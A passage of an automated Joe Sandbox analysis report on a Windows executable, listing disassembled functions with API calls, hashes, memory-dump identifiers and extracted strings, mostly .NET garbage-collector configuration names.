                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                  • Opcode ID: d97dfab9c5e2ca5e289d41580aff86dd4a5f9488f693484709a33908da07a3c5
                                                                                                                                                                                                                                  • Instruction ID: 311cd7f5218466dbd054715fbc0e1f6a2f92b433e7cfa43e3ec1b7b6845a13ef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d97dfab9c5e2ca5e289d41580aff86dd4a5f9488f693484709a33908da07a3c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2621D323F0C16199FB50E6719C255FD22B06F917A4F640136ED4DD7B87CE2EA983B288
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385CB560 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EventRegister
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3840811365-0
                                                                                                                                                                                                                                  • Opcode ID: 5002b474bb04ea49417c636b9c7ede251b2549fc1c56c93d51276f5579b127f3
                                                                                                                                                                                                                                  • Instruction ID: e5a60f69cbad685dd49264fcfd4a8e6d799877084b32110550833568a57b9109
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5002b474bb04ea49417c636b9c7ede251b2549fc1c56c93d51276f5579b127f3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF21C362E08A8791EB60AB31E8419F433A2EF04754F409177C80DD6362DF3FA589EB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385C5D20 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2131581837-0
                                                                                                                                                                                                                                  • Opcode ID: 75531f9ef1e05551313e84bc67e7be72a58d736af8ca60721ca344a7d4dec63b
                                                                                                                                                                                                                                  • Instruction ID: acd18552eb17ff4b9aa354b50521350b5191a03479b3ef3da31a532708ee6d74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75531f9ef1e05551313e84bc67e7be72a58d736af8ca60721ca344a7d4dec63b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B01AD33B0874292EB48EB71B9052E9B3A1FB06780F004039EB5D87746CF7DE424AB08
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF6385D4CA0 Relevance: 113.0, Strings: 90, Instructions: 532COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                                                                                                                                                                                                                                  • API String ID: 0-2278931206
                                                                                                                                                                                                                                  • Opcode ID: 7d9e740062ad0d414f9252967952863cffa33398030164f4c9e074f188c9779b
                                                                                                                                                                                                                                  • Instruction ID: 621fe3065b7e1296d98796d424706541ea22c3795814742f6c1e9132009373c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d9e740062ad0d414f9252967952863cffa33398030164f4c9e074f188c9779b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E325C62A08B9682EB209B25F810AE967A1FF557CCF416132DD8D47F24DF3ED2069748
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D5950 Relevance: 104.0, Strings: 83, Instructions: 274COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                                                                                                                                                                                                  • API String ID: 0-2894337444
                                                                                                                                                                                                                                  • Opcode ID: d5899f85e7324bffdf75d1a60207a93c99c8708487a97b5eae93eb359406f58a
                                                                                                                                                                                                                                  • Instruction ID: ecc756da6df8fe14d59a35a5cecde0973db3ef4f63c986d14fb3c03d6e76a6bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5899f85e7324bffdf75d1a60207a93c99c8708487a97b5eae93eb359406f58a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F1E957D28A87A1F705EB74EC501F13376AF94318FC45133D80EC62A29E3EA64AE749
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D4AD0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                                                                                                                                                                                                  • String ID: SeLockMemoryPrivilege
                                                                                                                                                                                                                                  • API String ID: 1752251271-475654710
                                                                                                                                                                                                                                  • Opcode ID: 275778b2c87945346c343b7060d433ef645a75266afabc79b075121605c67c8d
                                                                                                                                                                                                                                  • Instruction ID: 2f562e1670652d1aff5fe033b1d5f6034b3d9794f48ef89f0142c8c3244c3b3b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 275778b2c87945346c343b7060d433ef645a75266afabc79b075121605c67c8d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F831B623A1C64286FB609B71E8553AAA7A1EF54795F004035DD4E83754DF3EE548D704
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385C9FF0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 223COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA05C
                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA198
                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA276
                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA28C
                                                                                                                                                                                                                                  • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA2CA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFailFastRaise
                                                                                                                                                                                                                                  • String ID: [ KeepUnwinding ]
                                                                                                                                                                                                                                  • API String ID: 2546344036-400895726
                                                                                                                                                                                                                                  • Opcode ID: 14f8151ae2a9b00e55a37d6bfd4d89bac21379c7a9a794f679ba3dd1bac369d4
                                                                                                                                                                                                                                  • Instruction ID: daad0ac105a678160999b3b6b0706c551ddbf814bc12d920665c224f8ee7ff24
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14f8151ae2a9b00e55a37d6bfd4d89bac21379c7a9a794f679ba3dd1bac369d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69A17373A09B4181EB958F35D4402E937B1FB44FA8F244136CA4D8779ADF3AD485E714
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F00A0 Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F029B
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F02DD
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F0308
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F0329
                                                                                                                                                                                                                                  • FlushProcessWriteBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F0597
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$BuffersFlushProcessWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2950773196-0
                                                                                                                                                                                                                                  • Opcode ID: 28e8806297d9716eb0f9ab73adbd07b2b27ead853266ea04d2401ea6defbfe2d
                                                                                                                                                                                                                                  • Instruction ID: 23f93651439571eb7c2cc77da5752c06a320b817732c3b73311ddbd925f0e72b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28e8806297d9716eb0f9ab73adbd07b2b27ead853266ea04d2401ea6defbfe2d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BE18B63B09686C2EAA09B35E8403F963A1FF54B94F484532D95CC7795DF3EE588E308
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF63862B180 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: 170a2accd421f9800a2ca1e9465c53bf2d32f5c259a91f73e09212cd5c2c4438
                                                                                                                                                                                                                                  • Instruction ID: b3d27ad5e3752cc488ee32da7ad3e07f543428a9e6b1abde4e8c4fc7c86c846e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 170a2accd421f9800a2ca1e9465c53bf2d32f5c259a91f73e09212cd5c2c4438
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE115A36B64F028AEB00CFB0E8552B833B4FB59758F440E31DA6D867A4DF38E5989340
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

